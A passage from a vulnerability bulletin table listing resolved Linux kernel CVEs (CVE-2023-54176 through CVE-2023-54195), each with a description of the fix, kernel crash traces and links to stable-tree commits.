mptcp worker. | 2025-12-30 | not yet calculated | CVE-2023-54176 | https://git.kernel.org/stable/c/f0b4a4086cf27240fc621a560da9735159049dcc https://git.kernel.org/stable/c/aff9099e9c51f15c8def05c75b2b73e8487b5d54 https://git.kernel.org/stable/c/19ea79e87af32c2b3c6fc49bd84efeb35ca57678 https://git.kernel.org/stable/c/d6a0443733434408f2cbd4c53fea6910599bab9e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: quota: fix warning in dqgrab() There's issue as follows when do fault injection: WARNING: CPU: 1 PID: 14870 at include/linux/quotaops.h:51 dquot_disable+0x13b7/0x18c0 Modules linked in: CPU: 1 PID: 14870 Comm: fsconfig Not tainted 6.3.0-next-20230505-00006-g5107a9c821af-dirty #541 RIP: 0010:dquot_disable+0x13b7/0x18c0 RSP: 0018:ffffc9000acc79e0 EFLAGS: 00010246 RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffff88825e41b980 RDX: 0000000000000000 RSI: ffff88825e41b980 RDI: 0000000000000002 RBP: ffff888179f68000 R08: ffffffff82087ca7 R09: 0000000000000000 R10: 0000000000000001 R11: ffffed102f3ed026 R12: ffff888179f68130 R13: ffff888179f68110 R14: dffffc0000000000 R15: ffff888179f68118 FS: 00007f450a073740(0000) GS:ffff88882fc00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007ffe96f2efd8 CR3: 000000025c8ad000 CR4: 00000000000006e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> dquot_load_quota_sb+0xd53/0x1060 dquot_resume+0x172/0x230 ext4_reconfigure+0x1dc6/0x27b0 reconfigure_super+0x515/0xa90 __x64_sys_fsconfig+0xb19/0xd20 do_syscall_64+0x39/0xb0 entry_SYSCALL_64_after_hwframe+0x63/0xcd Above issue may happens as follows: ProcessA ProcessB ProcessC sys_fsconfig vfs_fsconfig_locked reconfigure_super ext4_remount dquot_suspend -> suspend all type quota sys_fsconfig vfs_fsconfig_locked reconfigure_super ext4_remount dquot_resume ret = dquot_load_quota_sb add_dquot_ref do_open -> open file O_RDWR vfs_open do_dentry_open get_write_access atomic_inc_unless_negative(&inode->i_writecount) ext4_file_open dquot_file_open dquot_initialize __dquot_initialize dqget atomic_inc(&dquot->dq_count); __dquot_initialize __dquot_initialize dqget if (!test_bit(DQ_ACTIVE_B, &dquot->dq_flags)) ext4_acquire_dquot -> Return error DQ_ACTIVE_B flag isn't set dquot_disable invalidate_dquots if (atomic_read(&dquot->dq_count)) dqgrab WARN_ON_ONCE(!test_bit(DQ_ACTIVE_B, &dquot->dq_flags)) -> Trigger warning In the above scenario, 'dquot->dq_flags' has no DQ_ACTIVE_B is normal when dqgrab(). To solve above issue just replace the dqgrab() use in invalidate_dquots() with atomic_inc(&dquot->dq_count). | 2025-12-30 | not yet calculated | CVE-2023-54177 | https://git.kernel.org/stable/c/6478eabc92274efae6269da7c515ba2b4c8e88d8 https://git.kernel.org/stable/c/965bad2bf1afef64ec16249da676dc7310cca32e https://git.kernel.org/stable/c/3f378783c47b5749317ea008d8c931d6d3986d8f https://git.kernel.org/stable/c/cbaebbba722cb9738c55903efce11f51cdd97bee https://git.kernel.org/stable/c/579d814de87c3cac69c9b261efa165d07cde3357 https://git.kernel.org/stable/c/6432843debe1ec7d76c5b2f76c67f9c5df22436e https://git.kernel.org/stable/c/6f4e543d277a12dfeff027e6ab24a170e1bfc160 https://git.kernel.org/stable/c/d6a95db3c7ad160bc16b89e36449705309b52bcb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: of: unittest: fix null pointer dereferencing in of_unittest_find_node_by_name() when kmalloc() fail to allocate memory in kasprintf(), name or full_name will be NULL, strcmp() will cause null pointer dereference. | 2025-12-30 | not yet calculated | CVE-2023-54178 | https://git.kernel.org/stable/c/c364fa869b33ca42a263bf91c22fce7e6c61d479 https://git.kernel.org/stable/c/0b7d715511915a1b39f5fdcbe57a7922dfd66513 https://git.kernel.org/stable/c/dadf0d0dfcc81cdcb27ba5426676d13a9e4fb925 https://git.kernel.org/stable/c/f41c65f8d05be734898cbe72af59a401b97d298a https://git.kernel.org/stable/c/ea5bc6f5aa099e3e84d037282836234ad77cba88 https://git.kernel.org/stable/c/43cc228099c514467b8074d7ede6673cef9f33b9 https://git.kernel.org/stable/c/c74ae8124f9687062dd99858f34c9d027ddd73da https://git.kernel.org/stable/c/2dd8ee9de71ad8447f8459fb01dade7f6c7132da https://git.kernel.org/stable/c/d6ce4f0ea19c32f10867ed93d8386924326ab474 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: qla2xxx: Array index may go out of bound Klocwork reports array 'vha->host_str' of size 16 may use index value(s) 16..19. Use snprintf() instead of sprintf(). | 2025-12-30 | not yet calculated | CVE-2023-54179 | https://git.kernel.org/stable/c/e697f466bf61280b7e996c9ea096d7ec371c31ea https://git.kernel.org/stable/c/ea64c727f20123342020257cfa956fbfbd6d12ff https://git.kernel.org/stable/c/bcd773969a87d9802053c0db5be84abd6594a024 https://git.kernel.org/stable/c/748d8f8698a2f48ffe32dd7b35dbab1810ed1f82 https://git.kernel.org/stable/c/2b3bdef089b920b4a19fefb4f4e6dda56a4bb583 https://git.kernel.org/stable/c/e934737e18ff069a66cd53cd7f7a0b34ae2c24fe https://git.kernel.org/stable/c/d721b591b95cf3f290f8a7cbe90aa2ee0368388d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: handle case when repair happens with dev-replace [BUG] There is a bug report that a BUG_ON() in btrfs_repair_io_failure() (originally repair_io_failure() in v6.0 kernel) got triggered when replacing a unreliable disk: BTRFS warning (device sda1): csum failed root 257 ino 2397453 off 39624704 csum 0xb0d18c75 expected csum 0x4dae9c5e mirror 3 kernel BUG at fs/btrfs/extent_io.c:2380! invalid opcode: 0000 [#1] PREEMPT SMP NOPTI CPU: 9 PID: 3614331 Comm: kworker/u257:2 Tainted: G OE 6.0.0-5-amd64 #1 Debian 6.0.10-2 Hardware name: Micro-Star International Co., Ltd. MS-7C60/TRX40 PRO WIFI (MS-7C60), BIOS 2.70 07/01/2021 Workqueue: btrfs-endio btrfs_end_bio_work [btrfs] RIP: 0010:repair_io_failure+0x24a/0x260 [btrfs] Call Trace: <TASK> clean_io_failure+0x14d/0x180 [btrfs] end_bio_extent_readpage+0x412/0x6e0 [btrfs] ? __switch_to+0x106/0x420 process_one_work+0x1c7/0x380 worker_thread+0x4d/0x380 ? rescuer_thread+0x3a0/0x3a0 kthread+0xe9/0x110 ? kthread_complete_and_exit+0x20/0x20 ret_from_fork+0x22/0x30 [CAUSE] Before the BUG_ON(), we got some read errors from the replace target first, note the mirror number (3, which is beyond RAID1 duplication, thus it's read from the replace target device). Then at the BUG_ON() location, we are trying to writeback the repaired sectors back the failed device. The check looks like this: ret = btrfs_map_block(fs_info, BTRFS_MAP_WRITE, logical, &map_length, &bioc, mirror_num); if (ret) goto out_counter_dec; BUG_ON(mirror_num != bioc->mirror_num); But inside btrfs_map_block(), we can modify bioc->mirror_num especially for dev-replace: if (dev_replace_is_ongoing && mirror_num == map->num_stripes + 1 && !need_full_stripe(op) && dev_replace->tgtdev != NULL) { ret = get_extra_mirror_from_replace(fs_info, logical, *length, dev_replace->srcdev->devid, &mirror_num, &physical_to_patch_in_first_stripe); patch_the_first_stripe_for_dev_replace = 1; } Thus if we're repairing the replace target device, we're going to trigger that BUG_ON(). But in reality, the read failure from the replace target device may be that, our replace hasn't reached the range we're reading, thus we're reading garbage, but with replace running, the range would be properly filled later. Thus in that case, we don't need to do anything but let the replace routine to handle it. [FIX] Instead of a BUG_ON(), just skip the repair if we're repairing the device replace target device. | 2025-12-30 | not yet calculated | CVE-2023-54180 | https://git.kernel.org/stable/c/a7018b40b49c37fb55736499f790ec0d2b381ae4 https://git.kernel.org/stable/c/53e9d6851b56626885476a2966194ba994f8bb4b https://git.kernel.org/stable/c/d73a27b86fc722c28a26ec64002e3a7dc86d1c07 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Fix issue in verifying allow_ptr_leaks After we converted the capabilities of our networking-bpf program from cap_sys_admin to cap_net_admin+cap_bpf, our networking-bpf program failed to start. Because it failed the bpf verifier, and the error log is "R3 pointer comparison prohibited". A simple reproducer as follows, SEC("cls-ingress") int ingress(struct __sk_buff *skb) { struct iphdr *iph = (void *)(long)skb->data + sizeof(struct ethhdr); if ((long)(iph + 1) > (long)skb->data_end) return TC_ACT_STOLEN; return TC_ACT_OK; } Per discussion with Yonghong and Alexei [1], comparison of two packet pointers is not a pointer leak. This patch fixes it. Our local kernel is 6.1.y and we expect this fix to be backported to 6.1.y, so stable is CCed. [1]. https://lore.kernel.org/bpf/CAADnVQ+Nmspr7Si+pxWn8zkE7hX-7s93ugwC+94aXSy4uQ9vBg@mail.gmail.com/ | 2025-12-30 | not yet calculated | CVE-2023-54181 | https://git.kernel.org/stable/c/c96c67991aac6401b4c6996093bccb704bb2ea4b https://git.kernel.org/stable/c/5927f0172d2809d8fc09c1ba667280b0387e9f73 https://git.kernel.org/stable/c/acfdc8b77016c8e648aadc283177546c88083dd3 https://git.kernel.org/stable/c/d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix to check readonly condition correctly With below case, it can mount multi-device image w/ rw option, however one of secondary device is set as ro, later update will cause panic, so let's introduce f2fs_dev_is_readonly(), and check multi-devices rw status in f2fs_remount() w/ it in order to avoid such inconsistent mount status. mkfs.f2fs -c /dev/zram1 /dev/zram0 -f blockdev --setro /dev/zram1 mount -t f2fs dev/zram0 /mnt/f2fs mount: /mnt/f2fs: WARNING: source write-protected, mounted read-only. mount -t f2fs -o remount,rw mnt/f2fs dd if=/dev/zero of=/mnt/f2fs/file bs=1M count=8192 kernel BUG at fs/f2fs/inline.c:258! RIP: 0010:f2fs_write_inline_data+0x23e/0x2d0 [f2fs] Call Trace: f2fs_write_single_data_page+0x26b/0x9f0 [f2fs] f2fs_write_cache_pages+0x389/0xa60 [f2fs] __f2fs_write_data_pages+0x26b/0x2d0 [f2fs] f2fs_write_data_pages+0x2e/0x40 [f2fs] do_writepages+0xd3/0x1b0 __writeback_single_inode+0x5b/0x420 writeback_sb_inodes+0x236/0x5a0 __writeback_inodes_wb+0x56/0xf0 wb_writeback+0x2a3/0x490 wb_do_writeback+0x2b2/0x330 wb_workfn+0x6a/0x260 process_one_work+0x270/0x5e0 worker_thread+0x52/0x3e0 kthread+0xf4/0x120 ret_from_fork+0x29/0x50 | 2025-12-30 | not yet calculated | CVE-2023-54182 | https://git.kernel.org/stable/c/e2759a59a4cc96af712084e9db7065c858c4fe9f https://git.kernel.org/stable/c/e05d63f8b48aad4613bd582c945bee41e2dd7255 https://git.kernel.org/stable/c/da8c535b28696017e5d1532d12ea78e836432d9e https://git.kernel.org/stable/c/d78dfefcde9d311284434560d69c0478c55a657e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: v4l2-core: Fix a potential resource leak in v4l2_fwnode_parse_link() If fwnode_graph_get_remote_endpoint() fails, 'fwnode' is known to be NULL, so fwnode_handle_put() is a no-op. Release the reference taken from a previous fwnode_graph_get_port_parent() call instead. Also handle fwnode_graph_get_port_parent() failures. In order to fix these issues, add an error handling path to the function and the needed gotos. | 2025-12-30 | not yet calculated | CVE-2023-54183 | https://git.kernel.org/stable/c/2342942331e1f034ff58f293e10d0d9b7581601f https://git.kernel.org/stable/c/4bc5ffaf8ac4f3e7a1fcd10a0a0e7b022b694877 https://git.kernel.org/stable/c/d8a8f75fce049bdb3144b607deefe51e996b9660 https://git.kernel.org/stable/c/caf058833b6f3fe7beabf738110f79bb987c8fff https://git.kernel.org/stable/c/25afb3e03bf8ab02567af4b6ffbfd6250a91a9f8 https://git.kernel.org/stable/c/ed1696f7f92e8404940d51dec80a123aa18163a8 https://git.kernel.org/stable/c/e8a1cd87bb9fa3149ee112ecb8058908dc9b520e https://git.kernel.org/stable/c/d7b13edd4cb4bfa335b6008ab867ac28582d3e5c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: target: iscsit: Free cmds before session free Commands from recovery entries are freed after session has been closed. That leads to use-after-free at command free or NPE with such call trace: Time2Retain timer expired for SID: 1, cleaning up iSCSI session. BUG: kernel NULL pointer dereference, address: 0000000000000140 RIP: 0010:sbitmap_queue_clear+0x3a/0xa0 Call Trace: target_release_cmd_kref+0xd1/0x1f0 [target_core_mod] transport_generic_free_cmd+0xd1/0x180 [target_core_mod] iscsit_free_cmd+0x53/0xd0 [iscsi_target_mod] iscsit_free_connection_recovery_entries+0x29d/0x320 [iscsi_target_mod] iscsit_close_session+0x13a/0x140 [iscsi_target_mod] iscsit_check_post_dataout+0x440/0x440 [iscsi_target_mod] call_timer_fn+0x24/0x140 Move cleanup of recovery enrties to before session freeing. | 2025-12-30 | not yet calculated | CVE-2023-54184 | https://git.kernel.org/stable/c/89f5055f9b0b57c7e7f02e32df95ef401f809b71 https://git.kernel.org/stable/c/4621e24c9257c6379343bf0c11b473817cf7edcd https://git.kernel.org/stable/c/1911cca5916b6e106de7afa3ec0a38447158216c https://git.kernel.org/stable/c/a7a4def6c7046e090bb10c6d550fdeb487db98ba https://git.kernel.org/stable/c/4ce221d295f53e6c6b835ab33181e735482c9aac https://git.kernel.org/stable/c/d8990b5a4d065f38f35d69bcd627ec5a7f8330ca |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: remove BUG_ON()'s in add_new_free_space() At add_new_free_space() we have these BUG_ON()'s that are there to deal with any failure to add free space to the in memory free space cache. Such failures are mostly -ENOMEM that should be very rare. However there's no need to have these BUG_ON()'s, we can just return any error to the caller and all callers and their upper call chain are already dealing with errors. So just make add_new_free_space() return any errors, while removing the BUG_ON()'s, and returning the total amount of added free space to an optional u64 pointer argument. | 2025-12-30 | not yet calculated | CVE-2023-54185 | https://git.kernel.org/stable/c/23e72231f8281505883514b23709076e234d4f27 https://git.kernel.org/stable/c/f775ceb0cb530e4a469b718fb2a24843071087f5 https://git.kernel.org/stable/c/d8ccbd21918fd7fa6ce3226cffc22c444228e8ad |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: typec: altmodes/displayport: fix pin_assignment_show This patch fixes negative indexing of buf array in pin_assignment_show when get_current_pin_assignments returns 0 i.e. no compatible pin assignments are found. BUG: KASAN: use-after-free in pin_assignment_show+0x26c/0x33c ... Call trace: dump_backtrace+0x110/0x204 dump_stack_lvl+0x84/0xbc print_report+0x358/0x974 kasan_report+0x9c/0xfc __do_kernel_fault+0xd4/0x2d4 do_bad_area+0x48/0x168 do_tag_check_fault+0x24/0x38 do_mem_abort+0x6c/0x14c el1_abort+0x44/0x68 el1h_64_sync_handler+0x64/0xa4 el1h_64_sync+0x78/0x7c pin_assignment_show+0x26c/0x33c dev_attr_show+0x50/0xc0 | 2025-12-30 | not yet calculated | CVE-2023-54186 | https://git.kernel.org/stable/c/0e61a7432fcd4bca06f05b7f1c7d7cb461880fe2 https://git.kernel.org/stable/c/4f9c0a7c272626cb6716ffc7800e8c73260cdce6 https://git.kernel.org/stable/c/ff466f77d0a56719979c4234abd412abd98eae8f https://git.kernel.org/stable/c/fc0e18f95c88435bd8a1ceb540243cd7fbcd9781 https://git.kernel.org/stable/c/08bd1be1c716fd50a7df48f82dcbc59a103082b5 https://git.kernel.org/stable/c/54ee23e4ab263a495ace1eed43d3883212ece17f https://git.kernel.org/stable/c/d8f28269dd4bf9b55c3fb376ae31512730a96fce |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix potential corruption when moving a directory F2FS has the same issue in ext4_rename causing crash revealed by xfstests/generic/707. See also commit 0813299c586b ("ext4: Fix possible corruption when moving a directory") | 2025-12-30 | not yet calculated | CVE-2023-54187 | https://git.kernel.org/stable/c/3e77036246123ff710fa2661dcaa12a45284f09b https://git.kernel.org/stable/c/957904f531fd857a92743b11fbc9c9ffdf7f3207 https://git.kernel.org/stable/c/8f57f3e112cf1d16682b6ff9c31c72f40f7da9c9 https://git.kernel.org/stable/c/8a0b544b7caedfbc05065b6377fd1d8bf7ef5e70 https://git.kernel.org/stable/c/f20191100952013f0916418cdaed0ab55c7b634c https://git.kernel.org/stable/c/0a76082a4a32a90d1ef33dee8b400efc082b4b6f https://git.kernel.org/stable/c/d94772154e524b329a168678836745d2773a6e02 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dmaengine: apple-admac: Fix 'current_tx' not getting freed In terminate_all we should queue up all submitted descriptors to be freed. We do that for the content of the 'issued' and 'submitted' lists, but the 'current_tx' descriptor falls through the cracks as it's removed from the 'issued' list once it gets assigned to be the current descriptor. Explicitly queue up freeing of the 'current_tx' descriptor to address a memory leak that is otherwise present. | 2025-12-30 | not yet calculated | CVE-2023-54188 | https://git.kernel.org/stable/c/b7abd535881a48587961c2099b1d2933ebd42c4b https://git.kernel.org/stable/c/fd4d88e68c75caf5c6f8293a36bc3ae289e0369e https://git.kernel.org/stable/c/d9503be5a100c553731c0e8a82c7b4201e8a970c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pstore/ram: Add check for kstrdup Add check for the return value of kstrdup() and return the error if it fails in order to avoid NULL pointer dereference. | 2025-12-30 | not yet calculated | CVE-2023-54189 | https://git.kernel.org/stable/c/8430a8e8e85420d4cb51dcb08b0278ab194ea82f https://git.kernel.org/stable/c/a14cb307267ba7a1715403e071bdc4deda77eef5 https://git.kernel.org/stable/c/38a9d7dac3ad25323145b4aaea3b5f434f50011d https://git.kernel.org/stable/c/f57ba91a46d3fc52bfdac9cca5cf5572ec7afd6d https://git.kernel.org/stable/c/2a764a2facd9dd88a69777200f65dfd0182765dc https://git.kernel.org/stable/c/065c81ae5817b245bb9feb6d54e027702740b49a https://git.kernel.org/stable/c/d97038d5ec2062733c1e016caf9baaf68cf64ea1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: leds: led-core: Fix refcount leak in of_led_get() class_find_device_by_of_node() calls class_find_device(), it will take the reference, use the put_device() to drop the reference when not need anymore. | 2025-12-30 | not yet calculated | CVE-2023-54190 | https://git.kernel.org/stable/c/1d6101d9222e1ca8c01b3fa9ebf0dcf7bcd82564 https://git.kernel.org/stable/c/690efcb5827c3bacbf1de90cd14907b91bf8cb7b https://git.kernel.org/stable/c/d880981b82223f9bf128dfdd2424abb0c658f345 https://git.kernel.org/stable/c/ddf3e82164afd9381b1d52c9f00b3878f7b6d308 https://git.kernel.org/stable/c/da1afe8e6099980fe1e2fd7436dca284af9d3f29 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mt76: mt7996: fix memory leak in mt7996_mcu_exit Always purge mcu skb queues in mt7996_mcu_exit routine even if mt7996_firmware_state fails. | 2025-12-30 | not yet calculated | CVE-2023-54191 | https://git.kernel.org/stable/c/b539d35e13e5d6b3dca76271261106b2356aa64c https://git.kernel.org/stable/c/da5b4d93e141b52c5a71d0c41a042d1bcaf70d2e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix null pointer panic in tracepoint in __replace_atomic_write_block We got a kernel panic if old_addr is NULL. https://bugzilla.kernel.org/show_bug.cgi?id=217266 BUG: kernel NULL pointer dereference, address: 0000000000000000 Call Trace: <TASK> f2fs_commit_atomic_write+0x619/0x990 [f2fs a1b985b80f5babd6f3ea778384908880812bfa43] __f2fs_ioctl+0xd8e/0x4080 [f2fs a1b985b80f5babd6f3ea778384908880812bfa43] ? vfs_write+0x2ae/0x3f0 ? vfs_write+0x2ae/0x3f0 __x64_sys_ioctl+0x91/0xd0 do_syscall_64+0x5c/0x90 entry_SYSCALL_64_after_hwframe+0x72/0xdc RIP: 0033:0x7f69095fe53f | 2025-12-30 | not yet calculated | CVE-2023-54192 | https://git.kernel.org/stable/c/424f8cdc0ad29e4940be96dcc0b935ba497adeda https://git.kernel.org/stable/c/1424358cd66c49460493293497b54cb72e0213cc https://git.kernel.org/stable/c/e2bbefc1741cb0732c13652be173da02f25611d1 https://git.kernel.org/stable/c/da6ea0b050fa720302b56fbb59307e7c7531a342 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/sched: cls_api: remove block_cb from driver_list before freeing Error handler of tcf_block_bind() frees the whole bo->cb_list on error. However, by that time the flow_block_cb instances are already in the driver list because driver ndo_setup_tc() callback is called before that up the call chain in tcf_block_offload_cmd(). This leaves dangling pointers to freed objects in the list and causes use-after-free[0]. Fix it by also removing flow_block_cb instances from driver_list before deallocating them. [0]: [ 279.868433] ================================================================== [ 279.869964] BUG: KASAN: slab-use-after-free in flow_block_cb_setup_simple+0x631/0x7c0 [ 279.871527] Read of size 8 at addr ffff888147e2bf20 by task tc/2963 [ 279.873151] CPU: 6 PID: 2963 Comm: tc Not tainted 6.3.0-rc6+ #4 [ 279.874273] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014 [ 279.876295] Call Trace: [ 279.876882] <TASK> [ 279.877413] dump_stack_lvl+0x33/0x50 [ 279.878198] print_report+0xc2/0x610 [ 279.878987] ? flow_block_cb_setup_simple+0x631/0x7c0 [ 279.879994] kasan_report+0xae/0xe0 [ 279.880750] ? flow_block_cb_setup_simple+0x631/0x7c0 [ 279.881744] ? mlx5e_tc_reoffload_flows_work+0x240/0x240 [mlx5_core] [ 279.883047] flow_block_cb_setup_simple+0x631/0x7c0 [ 279.884027] tcf_block_offload_cmd.isra.0+0x189/0x2d0 [ 279.885037] ? tcf_block_setup+0x6b0/0x6b0 [ 279.885901] ? mutex_lock+0x7d/0xd0 [ 279.886669] ? __mutex_unlock_slowpath.constprop.0+0x2d0/0x2d0 [ 279.887844] ? ingress_init+0x1c0/0x1c0 [sch_ingress] [ 279.888846] tcf_block_get_ext+0x61c/0x1200 [ 279.889711] ingress_init+0x112/0x1c0 [sch_ingress] [ 279.890682] ? clsact_init+0x2b0/0x2b0 [sch_ingress] [ 279.891701] qdisc_create+0x401/0xea0 [ 279.892485] ? qdisc_tree_reduce_backlog+0x470/0x470 [ 279.893473] tc_modify_qdisc+0x6f7/0x16d0 [ 279.894344] ? tc_get_qdisc+0xac0/0xac0 [ 279.895213] ? mutex_lock+0x7d/0xd0 [ 279.896005] ? __mutex_lock_slowpath+0x10/0x10 [ 279.896910] rtnetlink_rcv_msg+0x5fe/0x9d0 [ 279.897770] ? rtnl_calcit.isra.0+0x2b0/0x2b0 [ 279.898672] ? __sys_sendmsg+0xb5/0x140 [ 279.899494] ? do_syscall_64+0x3d/0x90 [ 279.900302] ? entry_SYSCALL_64_after_hwframe+0x46/0xb0 [ 279.901337] ? kasan_save_stack+0x2e/0x40 [ 279.902177] ? kasan_save_stack+0x1e/0x40 [ 279.903058] ? kasan_set_track+0x21/0x30 [ 279.903913] ? kasan_save_free_info+0x2a/0x40 [ 279.904836] ? ____kasan_slab_free+0x11a/0x1b0 [ 279.905741] ? kmem_cache_free+0x179/0x400 [ 279.906599] netlink_rcv_skb+0x12c/0x360 [ 279.907450] ? rtnl_calcit.isra.0+0x2b0/0x2b0 [ 279.908360] ? netlink_ack+0x1550/0x1550 [ 279.909192] ? rhashtable_walk_peek+0x170/0x170 [ 279.910135] ? kmem_cache_alloc_node+0x1af/0x390 [ 279.911086] ? _copy_from_iter+0x3d6/0xc70 [ 279.912031] netlink_unicast+0x553/0x790 [ 279.912864] ? netlink_attachskb+0x6a0/0x6a0 [ 279.913763] ? netlink_recvmsg+0x416/0xb50 [ 279.914627] netlink_sendmsg+0x7a1/0xcb0 [ 279.915473] ? netlink_unicast+0x790/0x790 [ 279.916334] ? iovec_from_user.part.0+0x4d/0x220 [ 279.917293] ? netlink_unicast+0x790/0x790 [ 279.918159] sock_sendmsg+0xc5/0x190 [ 279.918938] ____sys_sendmsg+0x535/0x6b0 [ 279.919813] ? import_iovec+0x7/0x10 [ 279.920601] ? kernel_sendmsg+0x30/0x30 [ 279.921423] ? __copy_msghdr+0x3c0/0x3c0 [ 279.922254] ? import_iovec+0x7/0x10 [ 279.923041] ___sys_sendmsg+0xeb/0x170 [ 279.923854] ? copy_msghdr_from_user+0x110/0x110 [ 279.924797] ? ___sys_recvmsg+0xd9/0x130 [ 279.925630] ? __perf_event_task_sched_in+0x183/0x470 [ 279.926656] ? ___sys_sendmsg+0x170/0x170 [ 279.927529] ? ctx_sched_in+0x530/0x530 [ 279.928369] ? update_curr+0x283/0x4f0 [ 279.929185] ? perf_event_update_userpage+0x570/0x570 [ 279.930201] ? __fget_light+0x57/0x520 [ 279.931023] ? __switch_to+0x53d/0xe70 [ 27 ---truncated--- | 2025-12-30 | not yet calculated | CVE-2023-54193 | https://git.kernel.org/stable/c/cc5fe387c6294d0471cb7ed064efac97fac65ccc https://git.kernel.org/stable/c/7311c8be3755611bf6edea4dfbeb190b4bdd489f https://git.kernel.org/stable/c/cb145932fcf6814e7e95e467eb70e7849a845ae9 https://git.kernel.org/stable/c/55866fe3fded3ce94ac3fc1bb3dfce654282f483 https://git.kernel.org/stable/c/26aec72429a05e917d574eca0efc5306c63a8862 https://git.kernel.org/stable/c/7b7a74ed303d532fb73ae4b1697f16a0fea89cd0 https://git.kernel.org/stable/c/da94a7781fc3c92e7df7832bc2746f4d39bc624e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: exfat: use kvmalloc_array/kvfree instead of kmalloc_array/kfree The call stack shown below is a scenario in the Linux 4.19 kernel. Allocating memory failed where exfat fs use kmalloc_array due to system memory fragmentation, while the u-disk was inserted without recognition. Devices such as u-disk using the exfat file system are pluggable and may be insert into the system at any time. However, long-term running systems cannot guarantee the continuity of physical memory. Therefore, it's necessary to address this issue. Binder:2632_6: page allocation failure: order:4, mode:0x6040c0(GFP_KERNEL|__GFP_COMP), nodemask=(null) Call trace: [242178.097582] dump_backtrace+0x0/0x4 [242178.097589] dump_stack+0xf4/0x134 [242178.097598] warn_alloc+0xd8/0x144 [242178.097603] __alloc_pages_nodemask+0x1364/0x1384 [242178.097608] kmalloc_order+0x2c/0x510 [242178.097612] kmalloc_order_trace+0x40/0x16c [242178.097618] __kmalloc+0x360/0x408 [242178.097624] load_alloc_bitmap+0x160/0x284 [242178.097628] exfat_fill_super+0xa3c/0xe7c [242178.097635] mount_bdev+0x2e8/0x3a0 [242178.097638] exfat_fs_mount+0x40/0x50 [242178.097643] mount_fs+0x138/0x2e8 [242178.097649] vfs_kern_mount+0x90/0x270 [242178.097655] do_mount+0x798/0x173c [242178.097659] ksys_mount+0x114/0x1ac [242178.097665] __arm64_sys_mount+0x24/0x34 [242178.097671] el0_svc_common+0xb8/0x1b8 [242178.097676] el0_svc_handler+0x74/0x90 [242178.097681] el0_svc+0x8/0x340 By analyzing the exfat code,we found that continuous physical memory is not required here,so kvmalloc_array is used can solve this problem. | 2025-12-30 | not yet calculated | CVE-2023-54194 | https://git.kernel.org/stable/c/79d16a84ea41272dfcb0c00f9798ddd0edd8098d https://git.kernel.org/stable/c/8a34a242cf03211cc89f68308d149b793f63c479 https://git.kernel.org/stable/c/1427a7e96fb90d0896f74f5bcd21feb03cc7c3d0 https://git.kernel.org/stable/c/0c5c3e8a2550b6b2a304b45f260296db9c09df96 https://git.kernel.org/stable/c/daf60d6cca26e50d65dac374db92e58de745ad26 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rxrpc: Fix timeout of a call that hasn't yet been granted a channel afs_make_call() calls rxrpc_kernel_begin_call() to begin a call (which may get stalled in the background waiting for a connection to become available); it then calls rxrpc_kernel_set_max_life() to set the timeouts - but that starts the call timer so the call timer might then expire before we get a connection assigned - leading to the following oops if the call stalled: BUG: kernel NULL pointer dereference, address: 0000000000000000 ... CPU: 1 PID: 5111 Comm: krxrpcio/0 Not tainted 6.3.0-rc7-build3+ #701 RIP: 0010:rxrpc_alloc_txbuf+0xc0/0x157 ... Call Trace: <TASK> rxrpc_send_ACK+0x50/0x13b rxrpc_input_call_event+0x16a/0x67d rxrpc_io_thread+0x1b6/0x45f ? _raw_spin_unlock_irqrestore+0x1f/0x35 ? rxrpc_input_packet+0x519/0x519 kthread+0xe7/0xef ? kthread_complete_and_exit+0x1b/0x1b ret_from_fork+0x22/0x30 Fix this by noting the timeouts in struct rxrpc_call when the call is created. The timer will be started when the first packet is transmitted. It shouldn't be possible to trigger this directly from userspace through AF_RXRPC as sendmsg() will return EBUSY if the call is in the waiting-for-conn state if it dropped out of the wait due to a signal. | 2025-12-30 | not yet calculated | CVE-2023-54195 | https://git.kernel.org/stable/c/92128a7170a220b5126d09a1c1954a3a8d46cef3 https://git.kernel.org/stable/c/72f4a9f3f447948cf86dffe1c4a4c8a429ab9666 https://git.kernel.org/stable/c/db099c625b13a74d462521a46d98a8ce5b53af5d |
